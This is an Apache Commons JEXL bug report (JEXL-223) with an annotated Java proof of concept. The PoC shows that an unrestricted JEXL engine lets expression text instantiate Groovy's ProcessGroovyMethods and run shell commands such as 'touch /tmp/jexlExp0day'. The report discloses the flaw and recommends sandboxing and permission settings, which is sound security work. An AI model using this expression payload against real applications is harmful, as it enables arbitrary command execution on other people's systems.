cnbird created JEXL-223: --------------------------- Summary: Apache Commons JEXL Expression Execute Command Vulnerability Key: JEXL-223 URL: https://issues.apache.org/jira/browse/JEXL-223 Project: Commons JEXL Issue Type: Bug Reporter: cnbird Priority: Critical
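/*
 * 0x01 Summary
 *
 * Apache Commons JEXL expression evaluation leads to command execution through
 * Groovy (org.codehaus.groovy.runtime.ProcessGroovyMethods) when Groovy is on the
 * classpath of the evaluating application.
 *
 * 0x02 POC
 *
 * What the listing below demonstrates: an engine built with the plain
 * JexlBuilder().create() defaults lets expression text instantiate an arbitrary
 * class by fully-qualified name via new("...") and then call methods on the result.
 * ProcessGroovyMethods exposes execute(String), which spawns a process, so whoever
 * controls the expression text controls command execution in the JVM that
 * evaluates it.
 *
 * Review note: the condition that makes this exploitable is evaluating
 * attacker-controlled expression text with an engine that has no class/method
 * restrictions. On the application side: never hand untrusted input to
 * createExpression()/createScript() on a default engine, and restrict what
 * scripts may reach (JexlBuilder.sandbox(...); later releases also expose a
 * permissions(...) setting -- confirm against the JEXL version in use).
 */
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.nio.charset.StandardCharsets;
import java.util.List;
import org.apache.commons.jexl3.JexlBuilder;
import org.apache.commons.jexl3.JexlContext;
import org.apache.commons.jexl3.JexlEngine;
import org.apache.commons.jexl3.JexlExpression;
import org.apache.commons.jexl3.MapContext;
import org.codehaus.groovy.runtime.ProcessGroovyMethods;

/**
 * Proof of concept for JEXL-223: command execution from a JEXL expression.
 *
 * <p>Runs two steps so the reader can separate the two ingredients:
 * <ol>
 *   <li>call {@code ProcessGroovyMethods.execute("id")} directly from Java, to show
 *       that the Groovy helper alone spawns a process (no JEXL involved);</li>
 *   <li>evaluate a JEXL expression that reaches the same helper through
 *       {@code new("...")}, which is the actual finding.</li>
 * </ol>
 *
 * <p>WARNING: step 2 has a real side effect -- it executes
 * {@code touch /tmp/jexlExp0day} on the machine running this class. Run it only
 * in a disposable environment.
 *
 * <p>Changes from the originally reported PoC: the unrelated direct
 * {@code ProcessBuilder("id").start()} (whose failure was only printed with
 * {@code printStackTrace()}) and the unused {@code foo} context variable were
 * removed; the static {@code execute} helper is now called statically instead of
 * through an instance; and the process's stdout is read and printed instead of
 * the {@code Process} object's {@code toString()}, which never showed the
 * command output.
 */
public class elExp {

    /**
     * The malicious expression: instantiate the Groovy helper class by name and
     * invoke its {@code execute(String)} on the new instance. The reported PoC
     * relies on JEXL resolving that call on the instance; the string is kept
     * exactly as submitted with the issue.
     */
    private static final String JEXL_EXP =
            "new(\"org.codehaus.groovy.runtime.ProcessGroovyMethods\").execute(\"touch /tmp/jexlExp0day\")";

    /**
     * Entry point; see the class comment for what each step demonstrates.
     *
     * @param args ignored
     * @throws IOException if spawning the baseline process or reading its output fails
     */
    public static void main(String[] args) throws IOException {
        // Step 1 -- baseline: the Groovy helper spawns a process on its own. Print its
        // stdout so the effect is visible (Process.toString() would not show it).
        Process direct = ProcessGroovyMethods.execute("id");
        System.out.println(readStdout(direct));

        // Step 2 -- the finding: a default-configured engine (no sandbox, no
        // permissions) evaluates expression text that reaches the same helper.
        JexlEngine jexl = new JexlBuilder().create();
        JexlExpression expression = jexl.createExpression(JEXL_EXP);

        // The expression needs nothing from the context; an empty MapContext suffices.
        JexlContext context = new MapContext();

        // Evaluation spawns the command. The result is whatever execute(...) returned
        // (a Process), printed only to confirm the call went through.
        Object result = expression.evaluate(context);
        System.out.println(result);
    }

    /**
     * Reads the whole standard output of a process as UTF-8 text.
     *
     * @param process a started process whose stdout has not been consumed
     * @return the captured output, one {@link System#lineSeparator()} per line
     * @throws IOException if the stream cannot be read
     */
    private static String readStdout(Process process) throws IOException {
        // try-with-resources closes the stream even if reading throws.
        try (BufferedReader reader = new BufferedReader(
                new InputStreamReader(process.getInputStream(), StandardCharsets.UTF_8))) {
            StringBuilder output = new StringBuilder();
            String line;
            while ((line = reader.readLine()) != null) {
                output.append(line).append(System.lineSeparator());
            }
            return output.toString();
        }
    }
}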